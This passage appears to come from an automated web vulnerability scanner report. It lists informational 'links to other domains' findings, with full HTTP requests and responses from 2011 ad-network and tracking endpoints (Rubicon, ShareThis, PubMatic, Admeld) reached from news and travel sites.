<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
<noscript><a href="http://ads.guardian.co.uk/event.ng/Type=click&FlightID=$FlightID$&AdID=$AdID$&TargetID=$TargetID$&Values=$Values$&Redirect=http://a.collective-media.net/jump/cm.guardian/;sz=300x250;ord=$random$?" target="_blank"><img src="http://a.collective-media.net/ad/cm.guardian/;sz=300x250;ord=$random$?" width="300" height="250" border="0" alt="http://ads.guardian.co.uk/event.ng/Type%3dclick%26FlightID%3d$FlightID$%26AdID%3d$AdID$%26TargetID%3d$TargetID$%26Values%3d$Values$%26Redirect%3d"></a></noscript><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
19.159. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/manchester-united
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; cd=false; lm="27 Sep 2011 22:12:09 GMT"; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; csi2=3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; ses2=13378^2; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses1=13209^2; csi1=3226251.js^2^1317599333^1317599350; rdk=8154/13209; ses15=13378^2&13209^2; csi15=3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:51:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^2; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=29334; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2122

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<iframe width="728" height="90" frameborder="0" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no" src="http://as.chango.com/links/adunit/1.31759946545e+12?adid=13711&adpos=1&agid=11720&atype=HISTORIC&bidder=bidder05-sj-west&bm=1.84408083393&cid=10449&da=10087&datc=san+jose&dc=namemedia&dom=guardian.co.uk&dsi=None&ebp=o2FsgIiZpXV8Zmapdw&eid=Rubicon&ht=90&ibs=None&kf=202041&kw=Malware+freeware&kwid=5827704&mw=1.0&poo=p&sid=6470e43e-ed51-11e0-81dc-00259035d426&st=broad&stid=guardian.co.uk&tkn=b6ae888c-d95b-11e0-b096-0025900e0834&ts=1317599465450&uf=0&uid=b6ae888c-d95b-11e0-b096-0025900e0834&url=http%3A%2F%2Fwww.guardian.co.uk%2Ffootball%2Fmanchester-united&wh=728&wp=6986326554ACD8CE&sig=fd001c7a6371daa8b682763d91066818"></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
19.160. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/22557-2.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /a/7845/12566/22557-2.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=13378^2&12566^3; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3188003.js^3^1317599406^1317599882&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1971

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=728x90;ord=$random$?" type="text/javascript"></script>
<noscript><a href="http://ads.guardian.co.uk/event.ng/Type=click&FlightID=$FlightID$&AdID=$AdID$&TargetID=$TargetID$&Values=$Values$&Redirect=http://a.collective-media.net/jump/cm.guardian/;sz=728x90;ord=$random$?" target="_blank"><img src="http://a.collective-media.net/ad/cm.guardian/;sz=728x90;ord=$random$?" width="728" height="90" border="0" alt="http://ads.guardian.co.uk/event.ng/Type%3dclick%26FlightID%3d$FlightID$%26AdID%3d$AdID$%26TargetID%3d$TargetID$%26Values%3d$Values$%26Redirect%3d"></a></noscript><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
19.161. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7845/12566/26848-15.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /a/7845/12566/26848-15.html? HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; au=GSAE3LG5-KKTN-10.208.77.156; put_1185=2944787775510337379; csi9=3197484.js^1^1317161525^1317161525; put_2101=e406aef0-9c85-4e03-b34a-8a4ca0074db1; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2081=OO-00000000000000000; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1197=3620501663059719663; rpb=4940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%267935%3D1%266643%3D1%264212%3D1%266286%3D1%265852%3D1%266432%3D1%267727%3D1%264210%3D1%265671%3D1%264554%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; ruid=154e62c97432177b6a4bcd01^9^1317599333^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses2=13378^2&12566^1; csi2=3188003.js^1^1317599406^1317599406&3192060.js^2^1317595852^1317596179&3185947.js^1^1317595852^1317595852; cd=false; lm="2 Oct 2011 23:50:10 GMT"; csi15=2748761.js^1^1317599431^1317599431&3188004.js^1^1317599406^1317599406&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; ses15=13378^2&13209^2&12566^1&12359^1; ses1=13209^3; csi1=3226929.js^1^1317599456^1317599456&3226251.js^2^1317599333^1317599350; ses8=13209^1; csi8=3226247.js^1^1317599462^1317599462

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:02 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7845/12566; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 03-Oct-2011 00:58:02 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13378^2&13209^2&12566^3&12359^1; expires=Mon, 03-Oct-2011 04:59:59 GMT; max-age=28917; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188004.js^2^1317599406^1317599882&2748761.js^1^1317599431^1317599431&3226249.js^2^1317599341^1317599383&3209195.js^2^1317595891^1317598688; expires=Sun, 09-Oct-2011 23:58:02 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1975

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script language="JavaScript" src="http://a.collective-media.net/adj/cm.guardian/;sz=300x250;ord=$random$?" type="text/javascript"></script>
<noscript><a href="http://ads.guardian.co.uk/event.ng/Type=click&FlightID=$FlightID$&AdID=$AdID$&TargetID=$TargetID$&Values=$Values$&Redirect=http://a.collective-media.net/jump/cm.guardian/;sz=300x250;ord=$random$?" target="_blank"><img src="http://a.collective-media.net/ad/cm.guardian/;sz=300x250;ord=$random$?" width="300" height="250" border="0" alt="http://ads.guardian.co.uk/event.ng/Type%3dclick%26FlightID%3d$FlightID$%26AdID%3d$AdID$%26TargetID%3d$TargetID$%26Values%3d$Values$%26Redirect%3d"></a></noscript><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,BusinessAndFinance" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
19.162. http://searchit.sabre.com/query.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://searchit.sabre.com
Path:   /query.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /query.html?qt=bond+interest+euro&search=search&col=shc&qs=&charset=iso-8859-1&ht=0&qp= HTTP/1.1
Host: searchit.sabre.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://sabre-holdings.com/aboutUs/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=240286337.1704621303.1317600419.1317600419.1317600419.1; __utmb=240286337.2.10.1317600419; __utmc=240286337; __utmz=240286337.1317600419.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=sabre%20travel

Response

HTTP/1.0 200 OK
Server: Ultraseek 5.0.3
Date: Mon, 03 Oct 2011 00:08:37 GMT
Content-type: text/html; charset=iso-8859-1
Content-length: 7727

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script language="JavaScript" type="text/javascript">

<!-- Get conent page link from URL
...[SNIP]...
</div>
<a href="http://www.verity.com/"><img alt="Powered by Verity" src="/images/poweredby.gif" width=161 height=45 border=0 align=right>
...[SNIP]...
19.163. http://seg.sharethis.com/getSegment.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.igougo.com%2Ftraveldeals%2Fratefinder.aspx%3FTypeID%3D1%26SourceID%3DTVLY-dRF-Popunder%26adlt%3D1%26end%3DBoston%26rm%3D1%26dest%3DBoston%2C%2520undefined%2520undefined%26strtDate%3D10%2F04%2F2011%26endDate%3D10%2F07%2F2011&jsref=http%3A%2F%2Fwww.travelocity.com%2FpopWindow2%3FtheDomain%3Dwww.travelocity.com%26selectedForm%3Dcb-form-ho%26formPrefix%3DHO%26fromDate%3Ddd%26fromMonth%3Dmm%26fromYear%3Dyyyy%26toDate%3Ddd%26toMonth%3Dmm%26toYear%3Dyyyy%26theAdtoShow%3Dad2%26dest%3DBOS%26triptype%3D%26noOfRooms%3D1%26noOfAdults%3D1%26service%3DTRAVELOCITY%26oneway%3D&rnd=1317601643778 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Mon, 03 Oct 2011 00:27:28 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 6174


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<img src="http://al1.sharethis.com/impr?campaign=adx-impr" alt=""/>
       <img src="http://cm.g.doubleclick.net/pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A" alt=""/>                <script type="text/javascript">
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>
...[SNIP]...
</script>
                   <script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js"></script>

           <img src="http://pixel.rubiconproject.com/tap.php?v=6432&rnd1317601648" alt="" width="1" height="1" />

           <img src="http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544463&t=2&rnd1317601648" alt=""/>

           <img src="http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6544462&t=2&rnd1317601648" alt=""/>


           <script type="text/javascript">
...[SNIP]...
19.164. http://showadsak.pubmatic.com/AdServer/AdServerServlet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/AdServerServlet?operId=2&pubId=26071&siteId=26072&adId=21044&kadwidth=160&kadheight=600&kbgColor=ffffff&ktextColor=000000&klinkColor=0000EE&pageURL=http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results&frameName=http_dm_travelocity_comhtml_ngadsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=resultskomli_ads_frame12607126072&kltstamp=2011-9-2%2019%3A9%3A0&ranreq=0.38537488016299903&timezone=-5&screenResolution=1920x1200&inIframe=1&adPosition=-1x-1&adVisibility=0 HTTP/1.1
Host: showadsak.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; PMAT=0; KRTBCOOKIE_80=1336-d454714d-69b5-4195-969b-ba426f1012c3.; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; PUBMDCID=1; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:09:11 GMT
Content-Length: 1710
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Tue, 02-Oct-2012 00:09:11 GMT; path=/
Set-Cookie: pubfreq_26072_21044_1115692444=823-1; domain=pubmatic.com; expires=Mon, 03-Oct-2011 00:49:11 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Tue, 04-Oct-2011 00:09:11 GMT; path=/

document.write('<div id="http_dm_travelocity_comhtml_ngadsize" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=12UAANhlAAA0UgAAAAAAAAAAAAAAAAAAA
...[SNIP]...
</iframe>');document.writeln('<img src="http://pixel.quantserve.com/pixel/p-5aWVS_roA1dVM.gif?labels=Travel" style="display: none;position:absolute;top:-15000px;" border="0" height="1" width="1" alt="Quantcast"/>');
19.165. http://static.igougo.com/scripts/all_53403.ashx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.igougo.com
Path:   /scripts/all_53403.ashx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /scripts/all_53403.ashx?Lo0P=d10051c1dcf48dfca1203fd21cf4182153459 HTTP/1.1
Host: static.igougo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.igougo.com/traveldeals/ratefinder.aspx?TypeID=1&SourceID=TVLY-dRF-Popunder&adlt=1&end=Boston&rm=1&dest=Boston,%20undefined%20undefined&strtDate=10/04/2011&endDate=10/07/2011
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SL_Audience=455|Accelerated|915|12|0; SL_NV12=1|12

Response

HTTP/1.1 200 OK
Server: SLRS
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 27 Sep 2011 02:07:25 GMT
X-Strangeloop: RCache
Content-Length: 53459
X-SL-RCache: Cached
Cache-Control: public, max-age=31235580
Expires: Fri, 28 Sep 2012 12:59:58 GMT
Date: Mon, 03 Oct 2011 00:26:58 GMT
Connection: close
Vary: Accept-Encoding

SearchAssistant=Class.create({options:$H({className:"suggest",minimumCharacters:3,timeout:10000,delay:40,displayNoResults:!0,noResultsMessage:"No Suggestion",cache:!0,templateField:null,maxItems:10,on
...[SNIP]...
</script>');try{Prototype.Browser.WebKit&&typeof Effect=="undefined"&&document.write('<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8/effects.js"></script>
...[SNIP]...
19.166. http://tag.admeld.com/id  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /id

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /id?redirect=http://cas.criteo.com/delivery/admeld_map?match=[admeld_user_id] HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; __qca=P0-273080792-1316409083560

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Location: http://cas.criteo.com/delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 02 Oct 2011 23:49:01 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://cas.criteo.com/delivery/admeld_map?match=4ec87822-8f33-4202-954a-f6f06a37734b">here</a>
...[SNIP]...
19.167. http://tap2-cdn.rubiconproject.com/partner/scripts/rubicon/emily.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap2-cdn.rubiconproject.com
Path:   /partner/scripts/rubicon/emily.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /partner/scripts/rubicon/emily.html?rtb_ext=1&pc=8154/13209 HTTP/1.1
Host: tap2-cdn.rubiconproject.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
